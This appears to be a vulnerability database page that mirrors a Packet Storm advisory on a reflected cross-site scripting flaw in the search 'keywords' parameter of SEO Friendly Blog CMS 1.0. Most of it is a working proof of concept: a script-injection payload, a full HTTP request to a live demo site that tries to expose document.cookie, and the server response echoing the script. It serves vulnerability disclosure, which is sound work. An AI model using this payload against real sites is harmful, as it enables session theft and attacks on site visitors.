Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:172399
HistoryMay 17, 2023 - 12:00 a.m.

SEO Friendly Blog CMS 1.0 Cross Site Scripting

2023-05-1700:00:00
nu11secur1ty
packetstormsecurity.com
139
JSON
`## Title: SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database-1.0-2023  
XSS-Reflected Vulnerability  
## Author: nu11secur1ty  
## Date: 05.17.2023  
## Vendor: https://technosmarter.com/  
## Software: https://github.com/technosmarter/SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database  
## Reference XSS: https://portswigger.net/web-security/cross-site-scripting  
  
  
## Description:  
The value of the keywords request parameter is copied into the HTML  
document as text between TITLE tags.  
The payload wi46u</title><script>alert(1)</script>fssgc was submitted  
in the keywords parameter. This input was echoed unmodified in the  
application's response.  
Conclusion: The `search` parameter is vulnerable for XSS-Reflected  
with Js injection.  
The malicious user can craft a very malicious URL and after this he  
can sending it  
to a very large group of people. This is very dangerous vulnerability.  
  
  
  
STATUS: CRITICAL Vulnerability  
  
[+]Exploit-XSS-test:  
```XSS  
POST /blog/search/%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/2  
Host: demo.technosmarter.com  
Cookie: PHPSESSID=c116aa1138f1c4a490514e8bad58eef4  
Content-Length: 73  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://demo.technosmarter.com  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://demo.technosmarter.com/blog/search/%3Cscript%3Ealert(document.cookie)%3C/script%3E  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
  
keywords=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&subsearch=  
```  
[+]Response:  
```HTTP  
HTTP/2 302 Found  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-cache, no-store, must-revalidate, max-age=0  
Pragma: no-cache  
Location: https://demo.technosmarter.com/blog/search/<script>alert(document.cookie)</script>  
Content-Type: text/html; charset=UTF-8  
Content-Length: 18035  
Vary: Accept-Encoding  
Date: Wed, 17 May 2023 10:42:45 GMT  
Server: LiteSpeed  
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload  
X-Xss-Protection: 1; mode=block  
X-Content-Type-Options: nosniff  
Alt-Svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000,  
h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000,  
h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"  
```  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/technosmarter/2023/SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database-1.0-2023)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/05/seo-friendly-blog-cms-10-2023-xss.html)  
  
## Time spend:  
00:37:00  
  
  
`
JSON